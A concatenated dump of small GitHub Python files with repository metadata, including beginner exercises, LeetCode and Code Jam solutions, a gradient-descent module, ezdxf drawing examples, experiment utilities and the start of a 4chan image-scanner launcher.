        # target Python 2 (see also the star-import of kernels above).
        for i in xrange(N):
            for j in xrange(N):
                cov[i][j] = self.kernel.calculate_kernel_value(data_vector[i], data_vector[j])
        #draw from the distribution and return
        return np.random.multivariate_normal(means,cov)
|
[
"noreply@github.com"
] |
BerenMillidge.noreply@github.com
|
acc8860470b0001df7b8ae5651c2f43957062c25
|
ab9b1505a9f57d28cb12b853f14c7d00d34c36c5
|
/cursopython/pythonteste/aula21ambiente02.py
|
99e2618b048a734f08e61eb2d64041cd1d63e1f6
|
[
"MIT"
] |
permissive
|
AtilaCosta87/Python
|
610a1170c8a043e09c3580f18a048181cfbc8348
|
b4eea7885d16df80feecc4c699a8348ca13a80c2
|
refs/heads/master
| 2022-05-27T04:24:40.469166
| 2020-04-25T02:08:23
| 2020-04-25T02:08:23
| 258,666,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
def soma(a=0, b=0, c=0):
    """
    -> Add up to three values and print the result (no trailing newline).
    :param a: the first value
    :param b: the second value
    :param c: the third value
    Originally written by Átila Costa following the CursoemVideo channel.
    """
    total = a + b + c
    print(f'A soma vale {total}', end='')
# Example invocations kept for reference:
#soma(3, 2, 5)
#soma(3, 2)
#soma(3)
#soma()
#soma(3, 3, 5, 8) -> would raise TypeError: at most 3 parameters are accepted
#soma(3, 3, 5)
#soma(b=4, c=2)
soma(c=3, a=2)
|
[
"atila_costa87@hotmail.com"
] |
atila_costa87@hotmail.com
|
6644c8aa6bde8b175f454eb1aa510bbe1314618c
|
cebc80d0d9dcdd0b2458f4d2105dcc489d2079ee
|
/setup.py
|
2d85325bff794a58bf51d88e285b8a390c7235ac
|
[] |
no_license
|
Gilles86/flogiston
|
1bd1fafc1a4a1efc5369293db34bcd0d4ce16582
|
62f27cdc4e740855c18139ff402face543bc5c92
|
refs/heads/master
| 2016-09-05T09:06:40.993535
| 2015-11-23T13:37:58
| 2015-11-23T13:37:58
| 29,321,422
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 767
|
py
|
#!/usr/bin/env python
#from distutils.core import setup
from setuptools import setup
def configuration(parent_package='',top_path=None):
    """Build the numpy.distutils configuration for this package.

    Registers the 'flogiston' subpackage; the returned object is consumed
    by numpy.distutils.core.setup() in main() below.
    """
    from numpy.distutils.misc_util import Configuration
    config = Configuration(None, parent_package, top_path)
    config.add_subpackage('flogiston')
    return config
def main():
    """Run numpy.distutils setup() with the flogiston package metadata."""
    # NOTE(review): numpy.distutils was removed from NumPy >= 1.26; this
    # setup script requires an older NumPy / Python toolchain.
    from numpy.distutils.core import setup
    setup(name='flogiston',
          version='0.1',
          description='Link fMRI data to cognitive models like the LBA model',
          author='Gilles de Hollander',
          author_email='gilles.de.hollander@gmail.com',
          url='http://www.gillesdehollander.nl',
          packages=['flogiston'],
          configuration=configuration
          )
if __name__ == '__main__':
    main()
|
[
"Gilles.de.Hollander@gmail.com"
] |
Gilles.de.Hollander@gmail.com
|
5c3ec9b8bca633c0b13497f11002177fbd589d58
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_151/ch22_2020_09_09_18_55_45_398877.py
|
949d4f34161a93ae72b7f3993ee0a87fd3a1d540
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
def reduction(x, y):
    """Return the estimated days of life lost, rounded to whole days.

    x: cigarettes smoked per day; y: years of smoking.
    Each cigarette is assumed to cost 10 minutes of life.
    """
    minutes_lost = 365 * x * y * 10
    return round(minutes_lost / (60 * 24), 0)
# Interactive driver: ask cigarettes/day and years smoked, print days lost.
a = int(input('cigarros p/ dia '))
b = int(input('fuma a quantos anos '))
c = reduction(a, b)
print(c)
|
[
"you@example.com"
] |
you@example.com
|
128902adf28d2ffa058348060bc4cb5b09cddc8a
|
5eb97d15b975c3ef3de10401594f31c502e04de4
|
/YeNet-Tensorflow/testSRM.py
|
f04d18729452e84e6c517654c59ebc785251e5bd
|
[] |
no_license
|
coriverchen/Steganalysis
|
863f133f506afa9e8400d2c14acee833d942d51f
|
f7844698bff217ff206b9a3de15ccec708951c83
|
refs/heads/master
| 2022-03-30T10:25:30.118715
| 2019-11-29T04:21:59
| 2019-11-29T04:21:59
| 256,136,538
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 8 14:33:16 2019
@author: Lee
"""
import numpy as np
# Load precomputed SRM (Spatial Rich Model) high-pass filter kernels and
# print the first one as a sanity check.
# NOTE(review): expects SRM_Kernels.npy in the current working directory.
SRM_Kernels = np.load('SRM_Kernels.npy')
print(SRM_Kernels[:1])
|
[
"870407139@qq.com"
] |
870407139@qq.com
|
c48d547a02107433a9ba668d5a79b1c1374499e5
|
03f1a716d426dcb7b5d77b9050e6332ab0726a9f
|
/nn6/__init__.py
|
724f5c4d6039bd7f245d65cd0740ea1f63523eab
|
[
"MIT"
] |
permissive
|
brice291/nn6
|
8e8688179834dfea3bd8d1f453e1135bfb6c5e45
|
9c7ca32514aa121ad36504f0c11177d8989660ae
|
refs/heads/master
| 2022-04-03T02:00:13.599236
| 2019-12-02T09:20:16
| 2019-12-02T09:20:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 839
|
py
|
import numpy as np
from numpy.linalg import norm
# Forward-difference partial derivative of f with respect to component k: df/dk.
def df(f, p, k, step=0.01):
    shifted = p.copy()
    shifted[k] = p[k] + step
    return (f(shifted) - f(p)) / step
# Numerical gradient of f at point p (component-wise forward differences).
def grad(f, p, step=0.01):
    g = p.copy()
    for k in range(len(p)):
        g[k] = df(f, p, k, step)
    return g
# Gradient descent: walk against the gradient until the step becomes tiny.
def gd(f, p0, step=0.001):
    p = p0.copy()
    while True:
        g = grad(f, p)   # gradient at the current point
        glen = norm(g)   # its length = size of the next move
        print('p=', p, 'f(p)=', f(p), 'glen=', glen)
        if glen < 0.00001:  # stop once the move would be negligible
            break
        p += np.multiply(g, -1 * step)  # one small step downhill
    return p  # the (approximate) minimizer
|
[
"ccckmit@gmail.com"
] |
ccckmit@gmail.com
|
850ac07380673e3ec79b314d5c5c986d50092181
|
f0a44b63a385e1c0f1f5a15160b446c2a2ddd6fc
|
/examples/transform_ucs.py
|
ee0962d84cada4759f9a40046f14c79071c8b632
|
[
"MIT"
] |
permissive
|
triroakenshield/ezdxf
|
5652326710f2a24652605cdeae9dd6fc58e4f2eb
|
82e964a574bcb86febc677bd63f1626318f51caf
|
refs/heads/master
| 2023-08-17T12:17:02.583094
| 2021-10-09T08:23:36
| 2021-10-09T08:23:36
| 415,426,069
| 1
| 0
|
MIT
| 2021-10-09T21:31:25
| 2021-10-09T21:31:25
| null |
UTF-8
|
Python
| false
| false
| 4,940
|
py
|
# Copyright (c) 2020-2021 Manfred Moitzi
# License: MIT License
import pathlib
import math
import ezdxf
from ezdxf import zoom
from ezdxf.math import UCS, Vec3
# Output directory for the generated DXF files.
OUTDIR = pathlib.Path("~/Desktop/Outbox").expanduser()
# Condensed text style used by the TEXT/MTEXT entities below.
NARROW = "OpenSansCondensed-Light"
# Grid size and spacing for scene 1.
X_COUNT = 7
Y_COUNT = 7
DX = 2
DY = 2
def add_circle(msp, ucs):
    """Add a magenta circle at the UCS origin and map it into the WCS."""
    circle = msp.add_circle(center=(0, 0), radius=0.5, dxfattribs={"color": 6})
    circle.transform(ucs.matrix)
def add_ocs_circle(msp, ucs):
    """Add a small OCS circle (extrusion along +x) and map it into the WCS."""
    attribs = {"color": 6, "extrusion": (1, 0, 0)}
    circle = msp.add_circle(center=(0, 0, 0.5), radius=0.25, dxfattribs=attribs)
    circle.transform(ucs.matrix)
def add_ellipse(msp, ucs):
    """Add a red half ellipse (parameter range 0..pi) and map it into the WCS."""
    half = msp.add_ellipse(
        center=(0, 0),
        major_axis=(0.5, 0, 0),
        ratio=0.5,
        start_param=0,
        end_param=math.pi,
        dxfattribs={"color": 1},
    )
    half.transform(ucs.matrix)
def add_ocs_arc(msp, ucs):
    """Add a cyan OCS arc (extrusion along -x) and map it into the WCS."""
    attribs = {"color": 4, "extrusion": (-1, 0, 0)}
    arc = msp.add_arc(center=(0, 0, 0.5), radius=0.25, start_angle=0,
                      end_angle=90, dxfattribs=attribs)
    arc.transform(ucs.matrix)
def add_solid(msp, ucs):
    """Add a small yellow SOLID triangle and map it into the WCS."""
    corners = [(-0.25, -0.15), (0.25, -0.15), (0, -0.5)]
    msp.add_solid(corners, dxfattribs={"color": 2}).transform(ucs.matrix)
def add_trace(msp, ucs):
    """Add a small white/black TRACE triangle and map it into the WCS."""
    corners = [(-0.25, 0.15), (0.25, 0.15), (0, 0.5)]
    msp.add_trace(corners, dxfattribs={"color": 7}).transform(ucs.matrix)
def add_3dface(msp, ucs):
    """Add a grey 3DFACE quad and map it into the WCS."""
    corners = [(0, 0, 0), (0.5, 0.5, 0), (0.5, 0.5, 0.5), (0, 0, 0.5)]
    face = msp.add_3dface(corners, dxfattribs={"color": 8})
    face.transform(ucs.matrix)
def add_lwpolyline(msp, ucs):
    """Add a magenta LWPOLYLINE ('xyb' point format) and map it into the WCS."""
    points = [(0, 0, 0), (0.3, 0, 1), (0.3, 0.3, 0), (0, 0.3, 0)]
    pline = msp.add_lwpolyline(points, format="xyb", dxfattribs={"color": 6})
    pline.transform(ucs.matrix)
def add_text(msp, ucs):
    """Add a middle-center aligned TEXT entity and map it into the WCS."""
    attribs = {"color": 4, "style": NARROW, "height": 0.2}
    text = msp.add_text("TEXT", dxfattribs=attribs)
    text.set_align("MIDDLE_CENTER").transform(ucs.matrix)
def add_mtext(msp, ucs):
    """Add a 90-degree rotated MTEXT entity and map it into the WCS.

    It is always better to use text_direction instead of a rotation angle,
    which works only for extrusion == (0, 0, 1).
    """
    attribs = {
        "color": 5,
        "style": NARROW,
        "char_height": 0.2,
        "insert": (0, 0),
        "rotation": 90,
        "attachment_point": 4,
    }
    msp.add_mtext("MTEXT", dxfattribs=attribs).transform(ucs.matrix)
def scene1(filename):
    """Render a 7x7 grid of entities and save the DXF to *filename*.

    Each cell's UCS is moved to the grid position; inside a column the UCS is
    rotated about its local z-axis in 15-degree increments, and each new
    column restarts from a UCS rotated about local x.
    """
    doc = ezdxf.new("R2010", setup=True)
    msp = doc.modelspace()
    ucs = UCS()
    angle = math.pi / 12  # 15 degree
    for ix in range(X_COUNT):
        for iy in range(Y_COUNT):
            ucs.moveto((ix * DX, iy * DY, 0))
            ucs.render_axis(msp, length=1)
            add_circle(msp, ucs)
            # add_ocs_circle(msp, ucs)
            # add_ocs_arc(msp, ucs)
            # add_text(msp, ucs)
            add_mtext(msp, ucs)
            add_ellipse(msp, ucs)
            # add_solid(msp, ucs)
            add_trace(msp, ucs)
            # add_3dface(msp, ucs)
            # add_lwpolyline(msp, ucs)
            # z-rotation accumulates from cell to cell within this column
            ucs = ucs.rotate_local_z(angle)
        # next column: fresh UCS with a growing local x-rotation
        ucs = UCS().rotate_local_x(ix * angle)
    zoom.extents(msp)
    doc.saveas(filename)
def add_excentric_text(msp, ucs, location, text):
    """Add MTEXT at *location* (UCS coordinates) plus three axis-parallel
    leader lines from the UCS origin to the insert point, all mapped to WCS."""
    mtext_attribs = {
        "color": 5,
        "style": NARROW,
        "char_height": 0.2,
        "insert": location,
        "attachment_point": 5,
    }
    msp.add_mtext(text, dxfattribs=mtext_attribs).transform(ucs.matrix)
    # Leader segments along the local x (red), y (green) and z (blue) axes.
    segments = [
        ((0, 0, 0), (location.x, 0, 0), 1),
        ((location.x, 0, 0), (location.x, location.y, 0), 3),
        ((location.x, location.y, 0), (location.x, location.y, location.z), 5),
    ]
    for start_point, end_point, color in segments:
        line = msp.add_line(start=start_point, end=end_point,
                            dxfattribs={"color": color})
        line.transform(ucs.matrix)
def scene2(filename):
    """Render a 5x5x5 lattice of rotated UCS frames, each annotated with an
    MTEXT label plus leader lines, and save the DXF to *filename*."""
    doc = ezdxf.new("R2010", setup=True)
    msp = doc.modelspace()
    delta = 6
    for z in range(-2, 3):
        for y in range(-2, 3):
            for x in range(-2, 3):
                cx = x * delta
                cy = y * delta
                cz = z * delta
                # Every cell gets the same local rotation (45° about z,
                # then 30° about x) at its lattice origin.
                ucs = (
                    UCS(origin=(cx, cy, cz))
                    .rotate_local_z(math.radians(45))
                    .rotate_local_x(math.radians(30))
                )
                add_excentric_text(
                    msp,
                    ucs,
                    location=Vec3(1, 2, 3),
                    text=f"Hallo\n(x={cx}, y={cy}, z={cz})",
                )
    zoom.extents(msp)
    doc.saveas(filename)
if __name__ == "__main__":
    # Generate both example scenes into the Outbox folder.
    scene1(OUTDIR / "transform_scene_1.dxf")
    scene2(OUTDIR / "transform_scene_2.dxf")
|
[
"me@mozman.at"
] |
me@mozman.at
|
35d2c662fbb29329f46cc039d12df65fcc2e402e
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_337/ch78_2020_04_12_01_52_05_952994.py
|
618d2e41901705a68a61d1e4af17bec9060603e5
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 491
|
py
|
# Interactive script: read athlete names and accelerations until 'sair'
# ("quit"), derive each athlete's race time from the acceleration, and try
# to pick the winner.
nome = input('Nome?')
atletas = {}
i = 0
while nome != 'sair':
    a = float(input('aceleração?'))
    atletas[nome] = a
    nome = input('Nome?')
    if i == 0:
        # NOTE(review): `vence` is seeded with an *acceleration* here but is
        # later compared against *times* — likely a bug; confirm intent.
        vence = a
    i+= 1
valores = atletas.values()
dic = {}
for i in valores:
    # t = (200/a)**0.5 — presumably from s = a*t^2/2 with s = 100 m; verify.
    tempo = (200/i)**(1/2)
    for k in atletas.keys():
        if atletas[k] == i:
            dic[k] = tempo
valor = dic.values()
for e in valor:
    if e < vence:
        vence = e
    # NOTE(review): this compares an acceleration (atletas[q]) to a time (e);
    # `atleta` may never be assigned — confirm against the exercise statement.
    for q in atletas:
        if atletas[q] == e:
            atleta = q
|
[
"you@example.com"
] |
you@example.com
|
6da4091fd8ac8ad313d1b7259bd84c569f0a6e08
|
920f0fbb7064f2017ff62da372eaf79ddcc9035b
|
/lc_ladder/company/amzn/oa/Search_A_2D_Matrix.py
|
617d0c9cea04baca4bd662f4ceb49c9887b4a548
|
[] |
no_license
|
JenZhen/LC
|
b29a1c45d8c905680c7b4ad0017516b3dca80cc4
|
85219de95e41551fce5af816b66643495fe51e01
|
refs/heads/master
| 2021-06-03T10:03:02.901376
| 2020-08-05T19:44:48
| 2020-08-05T19:44:48
| 104,683,578
| 3
| 1
| null | 2020-08-05T19:44:50
| 2017-09-24T23:30:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,980
|
py
|
#! /usr/local/bin/python3
# Requirement
# Example
# 写出一个高效的算法来搜索 m × n矩阵中的值。
#
# 这个矩阵具有以下特性:
#
# 每行中的整数从左到右是排序的。
# 每行的第一个数大于上一行的最后一个整数。
# 样例
# 考虑下列矩阵:
#
# [
# [1, 3, 5, 7],
# [10, 11, 16, 20],
# [23, 30, 34, 50]
# ]
# 给出 target = 3,返回 true
#
# 挑战
# O(log(n) + log(m)) 时间复杂度
"""
Algo: Binary Search
D.S.:
Solution:
Time: O(log(n) + log(m))
Corner cases:
"""
class Solution:
    """
    @param matrix: matrix, a list of lists of integers
    @param target: An integer
    @return: a boolean, indicate whether matrix contains target
    """
    def searchMatrix(self, matrix, target):
        """Two-phase binary search: find the candidate row, then the column.

        Assumes each row is sorted and each row's first element is greater
        than the previous row's last. Runs in O(log m + log n).
        """
        if not matrix or not matrix[0] or target is None:
            return False
        rows, cols = len(matrix), len(matrix[0])
        # Phase 1: binary-search for the row whose [first, last] range
        # could contain the target.
        lo, hi = 0, rows - 1
        row = -1
        while lo + 1 < hi:
            mid = lo + (hi - lo) // 2
            if matrix[mid][0] <= target <= matrix[mid][cols - 1]:
                row = mid
                break
            if target < matrix[mid][0]:
                hi = mid - 1
            else:
                lo = mid + 1
        if matrix[lo][0] <= target <= matrix[lo][cols - 1]:
            row = lo
        if matrix[hi][0] <= target <= matrix[hi][cols - 1]:
            row = hi
        if row == -1:
            return False
        # Phase 2: binary-search for the target inside the chosen row.
        lo, hi = 0, cols - 1
        while lo + 1 < hi:
            mid = lo + (hi - lo) // 2
            if matrix[row][mid] == target:
                return True
            if target < matrix[row][mid]:
                hi = mid - 1
            else:
                lo = mid + 1
        return matrix[row][lo] == target or matrix[row][hi] == target
# Test Cases (placeholder: just instantiates the solution).
if __name__ == "__main__":
    solution = Solution()
|
[
"jenzhen.nyc89@yahoo.com"
] |
jenzhen.nyc89@yahoo.com
|
8fccf7816b9470fb84f1a4004f158f26b3e9010d
|
fa165cdb86defd6d6131ac763c38d6875c4ebec8
|
/manage.py
|
e472a9b3db0e0dfb7893cce4f0d989c49fb87545
|
[] |
no_license
|
HongHanh120/generate-image-captcha
|
3f93665393eae0df41c2bafdb2e02a1d9dd29da4
|
144aae5fed9e15c670d8eda9501e53d7dc252256
|
refs/heads/main
| 2023-05-16T05:41:52.215234
| 2021-06-01T19:18:17
| 2021-06-01T19:18:17
| 354,935,311
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 672
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    # Point Django at this project's settings module unless already set.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'generate_captcha.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    # Dispatch to the management command named on the command line.
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
|
[
"lehonghanh.120@gmail.com"
] |
lehonghanh.120@gmail.com
|
d7ca2662615309dffb8694f7333f7b13866cb74a
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_1/kcrt/A.py
|
8a78979fdd4d2249fd6b2449edec65b0d5a74bda
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 371
|
py
|
# -*- coding: utf-8 -*-
# Google Code Jam 2016 Qualification Round, problem A ("Counting Sheep"):
# keep adding N to a running multiple until every decimal digit 0-9 has
# appeared across the multiples; print that multiple, or INSOMNIA for N == 0.
T = int(input())
for t in range(T):
    N = int(input())
    if N == 0:
        result = "INSOMNIA"
    else:
        n = 0
        digits_seen = set()
        # Accumulate digits of successive multiples until all 10 are seen.
        while len(digits_seen) != 10:
            n += N
            for x in str(n):
                digits_seen.add(x)
        result = str(n)
    print("Case #" + str(t + 1) + ": " + result)
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
497971334d48da8fa1c01f649fa7eedf0c06d2a2
|
b83ac23819fd7ba998563f2ad870405bdd07cc2b
|
/experiments/util/util.py
|
5911d151f027ca6f96b5121f25011c81af5f76ec
|
[
"MIT"
] |
permissive
|
Limmen/gym-idsgame
|
699abd2894bce15108f1606f5fb71f612dd7ba03
|
d10830fef55308d383c98b41b34688a7fceae357
|
refs/heads/master
| 2023-09-01T17:32:16.768138
| 2023-08-22T12:00:53
| 2023-08-22T12:00:53
| 247,794,752
| 49
| 12
|
MIT
| 2021-04-21T07:50:06
| 2020-03-16T19:00:27
|
Python
|
UTF-8
|
Python
| false
| false
| 3,889
|
py
|
"""
Utility functions for experiments with the idsgame-env
"""
import io
import json
import jsonpickle
import logging
import time
import argparse
import os
from gym_idsgame.config.client_config import ClientConfig
def create_artefact_dirs(output_dir: str, random_seed: int) -> None:
    """
    Creates artefact directories if they do not already exist

    :param output_dir: the base directory
    :param random_seed: the random seed of the experiment
    :return: None
    """
    # The original repeated an exists()/makedirs() pair six times; a loop
    # over the artefact kinds is equivalent and exist_ok=True makes the
    # check-then-create race-free.
    for kind in ("logs", "plots", "data", "hyperparameters", "gifs",
                 "tensorboard"):
        os.makedirs(os.path.join(output_dir, "results", kind,
                                 str(random_seed)), exist_ok=True)
def setup_logger(name: str, logdir: str, time_str = None):
    """
    Configures the logger for writing log-data of experiments

    :param name: name of the logger
    :param logdir: directory to save log files
    :param time_str: time string for file names
    :return: the configured logger
    """
    log_format = logging.Formatter('%(asctime)s,%(message)s')
    # A console handler is prepared but (as in the original setup) never
    # attached, so experiment records go to the log file only.
    console = logging.StreamHandler()
    console.setLevel(logging.INFO)
    console.setFormatter(log_format)
    logger = logging.getLogger(name)
    logger.setLevel(logging.INFO)
    # File handler: one fresh log file per run, named <time>_<name>.log.
    if time_str is None:
        time_str = str(time.time())
    file_handler = logging.FileHandler(
        logdir + "/" + time_str + "_" + name + ".log", mode="w")
    file_handler.setLevel(logging.INFO)
    file_handler.setFormatter(log_format)
    logger.addHandler(file_handler)
    return logger
def write_config_file(config: ClientConfig, path: str) -> None:
    """
    Writes a config object to a config file

    :param config: the config to write
    :param path: the path to write the file
    :return: None
    """
    encoded = jsonpickle.encode(config)
    pretty = json.dumps(json.loads(encoded), indent=4, sort_keys=True)
    with io.open(path, 'w', encoding='utf-8') as config_file:
        config_file.write(pretty)
def read_config(config_path) -> ClientConfig:
    """
    Reads configuration of the experiment from a json file

    :param config_path: the path to the configuration file
    :return: the configuration
    """
    with io.open(config_path, 'r', encoding='utf-8') as config_file:
        raw = config_file.read()
    return jsonpickle.decode(raw)
def parse_args(default_config_path):
    """
    Parses the commandline arguments with argparse

    :param default_config_path: default path to config file
    :return: the parsed argparse namespace
    """
    parser = argparse.ArgumentParser(
        description='Parse flags to configure the json parsing')
    parser.add_argument("-cp", "--configpath", type=str,
                        default=default_config_path,
                        help="Path to configuration file")
    parser.add_argument("-po", "--plotonly", action="store_true",
                        help="Boolean parameter, if true, only plot")
    parser.add_argument("-nc", "--noconfig", action="store_true",
                        help="Boolean parameter, if true always override config")
    return parser.parse_args()
|
[
"kimham@kth.se"
] |
kimham@kth.se
|
c83e2817d9a860680a5a11fdeadfb2a9d45c9037
|
1793aac7856809ed8e121955056154de50a2ae8f
|
/c07_pycon_tw/p14_digit_stack.py
|
51b37d4dba55ac1dce6921328221a67bb068261c
|
[] |
no_license
|
ZpRoc/checkio
|
fe4af88f116f75f8197cd31d857ae5262615b6af
|
126647f8971732bdf13d49092df178654dee889b
|
refs/heads/main
| 2023-03-22T23:52:37.330312
| 2021-03-10T02:28:56
| 2021-03-10T02:28:56
| 335,871,362
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 635
|
py
|
# ---------------------------------------------------------------- #
# Digit Stack
# Take the one off the top of the pile!
# (Numbers)
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
# ---------------------------------------------------------------- #
|
[
"zheng_roc@163.com"
] |
zheng_roc@163.com
|
5f477bed338ceb2d6e833ae8f6b79e32aa1680ee
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_sneers.py
|
a803280a36259a958b364c4e672bcfc2c97f2596
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
from xai.brain.wordbase.nouns._sneer import _SNEER
# Class header.
class _SNEERS(_SNEER):
    """Plural noun entry derived from the singular _SNEER word class."""
    def __init__(self):
        _SNEER.__init__(self)
        self.name = "SNEERS"
        self.specie = 'nouns'
        self.basic = "sneer"
        self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
291ab02ed979348e94062f8dfa48aa3b87c29f40
|
af5c8d742226965ef73cf761782f0825fb374b7c
|
/string_format/parcela.py
|
21d6fe1122398071d26d21ef974fc71e743cdae5
|
[] |
no_license
|
Zahidsqldba07/PythonExamples-1
|
002e99d2581c05bfb8a1766caff12991f55e11bb
|
a9f5bbc58cc6941a73c537b3a22d812cc9081785
|
refs/heads/master
| 2023-03-16T08:40:43.781000
| 2019-01-11T04:33:03
| 2019-01-11T04:33:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
# coding: utf-8
# Airline ticket pricing ("Passagem Aérea").
# (c) Héricles Emanuel, UFCG, Programação 1
# NOTE(review): Python 2 syntax (print statement, raw_input) — do not run
# under Python 3 without porting.
milhas = float(raw_input())
aliquota = float(raw_input())
# Ticket price: miles times rate plus a fixed R$ 51.00 fee.
valor_passagem = (milhas * aliquota) + 51.00
print "Valor da passagem: R$ %.2f" % valor_passagem
# Payment options
# Cash up front (25% discount)
pag_vista = valor_passagem * 0.75
# In 6 installments (5% discount)
pag_6 = valor_passagem * 0.95
# In 10 installments (full price)
pag_10 = valor_passagem
# Installment values
# 6 installments
parcela_6 = pag_6 / 6
# 10 installments
parcela_10 = pag_10 / 10
print "\nPagamento:"
print "1. À vista. R$ %.2f" % pag_vista
print "2. Em 6 parcelas. Total: R$ %.2f" % pag_6
print "   6 x R$ %.2f" % parcela_6
print "3. Em 10 parcelas. Total: R$ %.2f" % pag_10
print "   10 x R$ %.2f" % parcela_10
|
[
"noreply@github.com"
] |
Zahidsqldba07.noreply@github.com
|
2facbb1ce7570c8227c25a19f561d45f47185148
|
8ef5a09d76a11c56963f18e6a08474a1a8bafe3c
|
/leet_code/1446. Consecutive Characters.py
|
9379134d01e057544f21fef8f3b8eec1ee75c106
|
[] |
no_license
|
roiei/algo
|
32c4677649c7666db148f6183fbfbf66c8b1969f
|
ae8bb8bf4ae4026ccaf1dce323b4098547dd35ec
|
refs/heads/master
| 2022-04-01T19:21:27.768675
| 2022-02-19T06:15:29
| 2022-02-19T06:15:29
| 169,021,154
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 633
|
py
|
import time
from util.util_list import *
from util.util_tree import *
import copy
import heapq
import bisect
import collections
class Solution:
    def maxPower(self, s: str) -> int:
        """Return the length of the longest run of one repeated character."""
        if not s:
            return 0
        best = 1
        run = 1
        # Compare each character with its predecessor; extend or reset the run.
        for prev, ch in zip(s, s[1:]):
            run = run + 1 if ch == prev else 1
            if run > best:
                best = run
        return best
# Simple self-check with timing; maxPower("leetcode") -> 2 (the "ee" run).
stime = time.time()
print(2 == Solution().maxPower(s = "leetcode"))
print('elapse time: {} sec'.format(time.time() - stime))
|
[
"hyoukjea.son@hyundai.com"
] |
hyoukjea.son@hyundai.com
|
2f1a3d7401b312b6b3dbbeef3cacb792e34eb756
|
206e54f4ad23386a08b634dbf1c5bc691ef76390
|
/build/scripts-3.6/4scanner
|
80627675ba7ac052fa3161208bd2848b3dfb8f4e
|
[
"MIT"
] |
permissive
|
Python3pkg/4scanner
|
f604cd0e265ec96f39116270c5dedb67f4d9b7d1
|
7e647081fd6a4fb7baff1a5fd11e2cdc3d22bd20
|
refs/heads/master
| 2021-01-21T09:14:32.962898
| 2017-05-18T19:38:38
| 2017-05-18T19:38:38
| 91,650,218
| 0
| 0
| null | 2017-05-18T04:56:17
| 2017-05-18T04:56:17
| null |
UTF-8
|
Python
| false
| false
| 1,866
|
#!/usr/local/opt/python3/bin/python3.6
import argparse
import os
import scanner
import time
def main():
    """Parse command-line options, validate them and launch the scanner.

    FIX: --quota and --wait-time arrive from argparse as strings, so the
    original `'20' * 1000` repeated the string instead of multiplying and
    `args.wait_time * 60` did the same; both are now converted to int
    before arithmetic.
    """
    # Arguments parsing and validation
    parser = argparse.ArgumentParser()
    parser.add_argument("keywords_file",
                        help="file with the keywords to search for")
    parser.add_argument("-o", "--output", help="Specify output folder")
    parser.add_argument("-w", "--wait-time",
                        help="Time to wait between each scan in minutes. "
                             "Default is 5 minutes")
    parser.add_argument("-q", "--quota",
                        help="Exit when specified size quota "
                             "is exceeded. Ex: 500MB, 30GB etc...")
    args = parser.parse_args()
    # Checking keywords file
    if not os.path.isfile(args.keywords_file):
        print("Keywords file does not exist...")
        exit(1)
    # Output folder must already exist; default is the current directory.
    if args.output:
        output = args.output
        if not os.path.exists(output):
            print("{0} Does not exist.".format(output))
            exit(1)
    else:
        output = os.getcwd()
    # Checking for quota (normalized to an integer number of megabytes).
    quota_mb = False
    if args.quota:
        quota = args.quota.lower()
        try:
            if "gb" in quota:
                # BUG FIX: was `quota.split('g')[0] * 1000` (string repeat).
                quota_mb = int(quota.split('g')[0]) * 1000
            elif "mb" in quota:
                quota_mb = int(quota.split('m')[0])
            else:
                raise ValueError(quota)
        except ValueError:
            print("Quota format invalid. Valid example: 20GB, 700MB etc...")
